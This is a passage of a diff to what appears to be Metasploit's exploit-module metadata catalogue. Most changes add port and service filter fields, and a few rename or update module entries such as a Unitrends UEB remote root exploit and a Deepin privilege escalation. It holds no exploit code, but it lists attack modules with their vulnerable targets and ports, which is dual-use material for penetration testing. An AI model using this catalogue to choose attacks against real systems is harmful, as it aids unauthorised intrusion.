"platform": "Python", "arch": "python", "rport": 8445, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38500,6 +51516,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux" ], @@ -38533,6 +51564,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Billion 5200W-T" ], @@ -38566,6 +51612,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "P660HN-T v1" ], @@ -38599,6 +51660,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "P660HN-T v2" ], @@ -38612,36 +51688,57 @@ "notes": { } }, - "exploit_linux/http/ueb9_api_storage": { - "name": "Unitrends UEB 9 http api/storage remote root", - "full_name": "exploit/linux/http/ueb9_api_storage", + "exploit_linux/http/ueb_api_rce": { + "name": "Unitrends UEB http api remote code execution", + "full_name": "exploit/linux/http/ueb_api_rce", "rank": 600, "disclosure_date": "2017-08-08", "type": "exploit", "author": [ "Cale Smith", "Benny Husted", - "Jared Arave" + "Jared Arave", + "h00die" ], - "description": "It was discovered that the api/storage web interface in Unitrends Backup (UB)\n before 10.0.0 has an issue in which one of its input parameters was not validated.\n A remote attacker could use this flaw to bypass authentication and execute arbitrary\n commands with root privilege on the target system.", + "description": "It was discovered that the api/storage web interface in Unitrends Backup (UB)\n before 10.0.0 has an issue in which one of its input parameters was not validated.\n A remote attacker could use this flaw to bypass authentication and execute arbitrary\n commands with root privilege on the target system.\n UEB v9 runs the api under root privileges and api/storage is vulnerable.\n UEB v10 runs the api under limited privileges and api/hosts is vulnerable.", "references": [ "URL-https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756", + "URL-https://support.unitrends.com/UnitrendsBackup/s/article/000006002", "URL-https://nvd.nist.gov/vuln/detail/CVE-2017-12478", - "CVE-2017-12478" + "URL-http://blog.redactedsec.net/exploits/2018/01/29/UEB9.html", + "EDB-44297", + "CVE-2017-12478", + "CVE-2018-6328" ], "is_server": false, "is_client": false, "platform": "Linux", "arch": "x86", "rport": 443, - "targets": [ - "UEB 9.*" + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 ], - "mod_time": "2017-10-20 19:59:24 +0000", - "path": "/modules/exploits/linux/http/ueb9_api_storage.rb", + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "UEB 9.*", + "UEB < 10.1.0" + ], + "mod_time": "2018-09-11 05:24:01 +0000", + "path": "/modules/exploits/linux/http/ueb_api_rce.rb", "is_install_path": true, - "ref_name": "linux/http/ueb9_api_storage", - "check": false, + "ref_name": "linux/http/ueb_api_rce", + "check": true, "post_auth": false, "default_credential": false, "notes": { @@ -38671,6 +51768,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38706,6 +51818,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic (PHP Payload)", "Linux x86" @@ -38739,6 +51866,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -38773,6 +51915,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -38807,6 +51964,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WebCalendar 1.2.4 on Linux" ], @@ -38841,6 +52013,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WeBid 1.0.2 / Ubuntu" ], @@ -38872,6 +52059,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WiPG-1000 <=2.0.0.7" ], @@ -38905,6 +52107,21 @@ "platform": "Unix", "arch": "cmd", "rport": 9876, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38938,6 +52155,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Zabbix version <= 2.0.8" ], @@ -38970,6 +52202,21 @@ "platform": "Unix", "arch": "cmd", "rport": 444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -39002,6 +52249,21 @@ "platform": "Unix", "arch": "cmd", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -39037,6 +52299,21 @@ "platform": "Unix", "arch": "cmd", "rport": 40007, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "AlienVault <= 4.6.1" ], @@ -39070,6 +52347,12 @@ "platform": "Linux", "arch": "", "rport": 9080, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Debian 3.1 Sarge" ], @@ -39105,6 +52388,12 @@ "platform": "Linux", "arch": "", "rport": 143, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux Bruteforce" ], @@ -39149,6 +52438,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39190,6 +52485,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39232,6 +52533,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39276,6 +52583,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39307,6 +52620,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -39342,6 +52661,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -39393,6 +52718,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39428,6 +52759,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Cron", "User Crontab", @@ -39461,6 +52798,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x86_64" @@ -39493,6 +52836,12 @@ "platform": "Linux", "arch": "x86, x64, armle, mipsle, mipsbe", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -39541,6 +52890,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Linux x86", @@ -39581,6 +52936,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Linux x86", @@ -39623,6 +52984,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39657,6 +53024,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP System Management Homepage 7.1.1", "HP System Management Homepage 7.1.2" @@ -39693,6 +53066,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39727,6 +53106,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Kloxo 6.1.12" ], @@ -39750,7 +53135,7 @@ "King's Way", "Brendan Coles" ], - "description": "This module attempts to gain root privileges on Deepin Linux systems\n by using lastore-daemon to install a package.\n\n The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any\n user in the sudo group to install arbitrary system packages without\n providing a password, resulting in code execution as root. By default,\n the first user created on the system is a member of the sudo group.\n\n This module has been tested successfully with lastore-daemon version\n 0.9.53-1 on Deepin Linux 15.5 (x64).", + "description": "This module attempts to gain root privileges on Deepin Linux systems\n by using lastore-daemon to install a package.\n\n The lastore-daemon D-Bus configuration on Deepin Linux permits any\n user in the sudo group to install arbitrary system packages without\n providing a password, resulting in code execution as root. By default,\n the first user created on the system is a member of the sudo group.\n\n This module has been tested successfully with lastore-daemon versions\n 0.9.53-1 on Deepin Linux 15.5 (x64); and\n 0.9.66-1 on Deepin Linux 15.7 (x64).", "references": [ "EDB-39433", "URL-https://gist.github.com/bcoles/02aa274ce32dc350e34b6d4d1ad0e0e8" @@ -39760,10 +53145,16 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], - "mod_time": "2018-03-24 23:16:42 +0000", + "mod_time": "2018-10-04 21:13:21 +0000", "path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb", "is_install_path": true, "ref_name": "linux/local/lastore_daemon_dbus_priv_esc", @@ -39798,6 +53189,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39835,6 +53232,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Ubuntu" ], @@ -39876,6 +53279,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -39910,6 +53319,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -39946,6 +53361,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "CVE-2015-1328", "CVE-2015-8660" @@ -39981,6 +53402,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -40013,6 +53440,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40052,6 +53485,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -40091,6 +53530,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -40122,6 +53567,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto", "System V", @@ -40165,6 +53616,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86" ], @@ -40200,6 +53657,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86" ], @@ -40235,6 +53698,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -40278,6 +53747,12 @@ "platform": "Linux", "arch": "x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Auto" ], @@ -40315,6 +53790,12 @@ "platform": "Linux", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux x86", "Linux x64" @@ -40353,6 +53834,12 @@ "platform": "Linux", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40385,6 +53872,12 @@ "platform": "Linux,Unix", "arch": "cmd, x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Command payload", "Linux x86" @@ -40419,6 +53912,12 @@ "platform": "Unix", "arch": "cmd", "rport": 8812, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40454,6 +53953,12 @@ "platform": "Unix", "arch": "cmd", "rport": 9999, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40487,6 +53992,12 @@ "platform": "Unix", "arch": "cmd", "rport": 8787, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Trap", @@ -40524,6 +54035,12 @@ "platform": "Linux", "arch": "x86", "rport": 2525, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "RedHat Linux 7.0 (Guinness)" ], @@ -40562,6 +54079,12 @@ "platform": "Linux", "arch": "armle", "rport": 4070, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -40594,6 +54117,12 @@ "platform": "Linux", "arch": "armle", "rport": 554, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DS-7204 Firmware V2.2.10 build 131009", "Debug Target" @@ -40633,6 +54162,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 5555, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP Data Protector 6.10/6.11/6.20 on Linux" ], @@ -40667,6 +54202,12 @@ "platform": "", "arch": "", "rport": 9100, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Unix (In-Memory)" ], @@ -40700,6 +54241,12 @@ "platform": "Unix", "arch": "cmd", "rport": 7426, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "HP NNMi 9.10 / CentOS 5", @@ -40737,6 +54284,12 @@ "platform": "Linux", "arch": "x86", "rport": 13838, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "HP VSA 9" ], @@ -40772,6 +54325,12 @@ "platform": "Unix", "arch": "cmd", "rport": 2207, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic (hplip-1.6.7-4.i386.rpm)" ], @@ -40807,6 +54366,12 @@ "platform": "Linux", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253" ], @@ -40842,6 +54407,12 @@ "platform": "Linux", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253" ], @@ -40877,6 +54448,12 @@ "platform": "Linux", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253" ], @@ -40912,6 +54489,12 @@ "platform": "Linux", "arch": "x86", "rport": 3050, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253" ], @@ -40953,6 +54536,12 @@ "platform": "Java", "arch": "java", "rport": "8080", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Jenkins 1.637" ], @@ -40991,6 +54580,12 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": "8080", + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Jenkins 2.31" ], @@ -41030,6 +54625,12 @@ "platform": "Linux", "arch": "x86", "rport": 515, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Caldera OpenLinux 2.3 Bruteforce", @@ -41066,6 +54667,12 @@ "platform": "Linux", "arch": "", "rport": 27017, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux - mongod 2.2.3 - 32bits" ], @@ -41101,6 +54708,12 @@ "platform": "Unix", "arch": "cmd", "rport": 5666, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Nagios Remote Plugin Executor prior to 2.14" ], @@ -41135,6 +54748,12 @@ "platform": "", "arch": "", "rport": 53413, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -41173,6 +54792,12 @@ "platform": "Linux", "arch": "x86", "rport": 5405, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "linux" ], @@ -41211,6 +54836,12 @@ "platform": "Linux", "arch": "x86", "rport": 524, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Novell eDirectory 8.8.7 v20701.33/ SLES 10 SP3" ], @@ -41243,6 +54874,12 @@ "platform": "", "arch": "", "rport": 1099, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "OpenNMS / Linux x86", "OpenNMS / Linux x86_64" @@ -41279,6 +54916,12 @@ "platform": "Linux", "arch": "armle", "rport": 9251, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -41311,6 +54954,12 @@ "platform": "Unix", "arch": "cmd", "rport": 12345, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quest Privilege Manager pmmasterd 6.0.0-27 x64", "Quest Privilege Manager pmmasterd 6.0.0-27 x86" @@ -41345,6 +54994,12 @@ "platform": "Linux", "arch": "", "rport": 32764, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Generic Linux MIPS Big Endian", "Generic Linux MIPS Little Endian", @@ -41391,6 +55046,12 @@ "platform": "Linux", "arch": "x86", "rport": 1743, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "UEB 9.*" ], @@ -41427,6 +55088,12 @@ "platform": "Unix", "arch": "cmd", "rport": 10051, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Zabbix 1.6.7" ], @@ -41463,6 +55130,12 @@ "platform": "Linux", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Debian 5.0 - MySQL (5.0.51a-24+lenny2)" @@ -41497,6 +55170,12 @@ "platform": "Linux", "arch": "", "rport": 3306, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MySQL 5.0.45-Debian_1ubuntu3.1-log" ], @@ -41534,6 +55213,12 @@ "platform": "Linux", "arch": "", "rport": 110, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Gentoo 2006.0 Linux 2.6" ], @@ -41568,6 +55253,12 @@ "platform": "Linux", "arch": "", "rport": 5432, + "autofilter_ports": [ + 5432 + ], + "autofilter_services": [ + "postgres" + ], "targets": [ "Linux x86", "Linux x86_64" @@ -41603,6 +55294,12 @@ "platform": "Linux", "arch": "x86", "rport": 1723, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux Bruteforce" ], @@ -41637,6 +55334,12 @@ "platform": "Linux", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Linux Bruteforce" ], @@ -41671,6 +55374,14 @@ "platform": "Linux", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Linux (Debian5 3.2.5-4lenny6)", "Debugging Target" @@ -41706,6 +55417,14 @@ "platform": "Linux", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic (Interact)", "Automatic (Command)", @@ -41755,6 +55474,14 @@ "platform": "Linux", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Linux vsyscall", "Linux Heap Brute Force (Debian/Ubuntu)", @@ -41801,6 +55528,14 @@ "platform": "Linux,Unix", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10", "2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10", @@ -41841,6 +55576,14 @@ "platform": "Linux", "arch": "", "rport": 139, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Samba 2.2.x - Bruteforce" ], @@ -41876,6 +55619,18 @@ "platform": "Linux", "arch": "x86", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Linux x86" ], @@ -41913,6 +55668,12 @@ "platform": "Unix", "arch": "cmd", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -41948,6 +55709,12 @@ "platform": "Linux", "arch": "x64, x86", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "linux x64", "linux x86" @@ -41985,6 +55752,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42018,6 +55791,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42052,6 +55831,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42083,6 +55868,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42115,6 +55906,12 @@ "platform": "Python", "arch": "python", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -42146,6 +55943,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42177,6 +55980,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Quantum vmPRO 3.1.2" ], @@ -42209,6 +56018,12 @@ "platform": "Python", "arch": "python", "rport": 32022, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -42245,6 +56060,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Symantec Messaging Gateway 9.5" ], @@ -42278,6 +56099,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Ubiquiti airOS < 5.6.2" ], @@ -42310,6 +56146,12 @@ "platform": "Unix", "arch": "cmd", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal" ], @@ -42345,6 +56187,12 @@ "platform": "Unix", "arch": "cmd", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic (detect TCP or UDP)", "TCP (typically older devices)", @@ -42384,6 +56232,12 @@ "platform": "Linux", "arch": "", "rport": 23, + "autofilter_ports": [ + 23 + ], + "autofilter_services": [ + "telnet" + ], "targets": [ "Automatic", "Red Hat Enterprise Linux 3 (krb5-telnet)" @@ -42418,6 +56272,12 @@ "platform": "", "arch": "", "rport": 1900, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -42456,6 +56316,21 @@ "platform": "Linux", "arch": "x86, mipsbe", "rport": 5555, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Debian GNU/Linux 6.0 / MiniUPnPd 1.0", "Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0" @@ -42490,6 +56365,13 @@ "platform": "Mainframe", "arch": "cmd", "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], "targets": [ "Automatic" ], @@ -42526,6 +56408,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42568,6 +56456,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42607,6 +56501,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42644,6 +56544,12 @@ "platform": "Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -42680,6 +56586,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42718,6 +56630,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42756,6 +56674,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42793,6 +56717,12 @@ "platform": "Linux,Windows", "arch": "x86", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows", "Linux" @@ -42829,6 +56759,12 @@ "platform": "OSX,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 3.5.0 on Windows XP SP0-SP3", "Firefox 3.5.0 on Mac OS X 10.5.7 (Intel)" @@ -42864,6 +56800,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -42900,6 +56842,12 @@ "platform": "Java,Linux,OSX,Solaris,Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -42935,6 +56883,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal (Javascript XPCOM Shell)", "Native Payload" @@ -42970,6 +56924,12 @@ "platform": "Linux,OSX", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Firefox 1.5.0.0 Mac OS X", 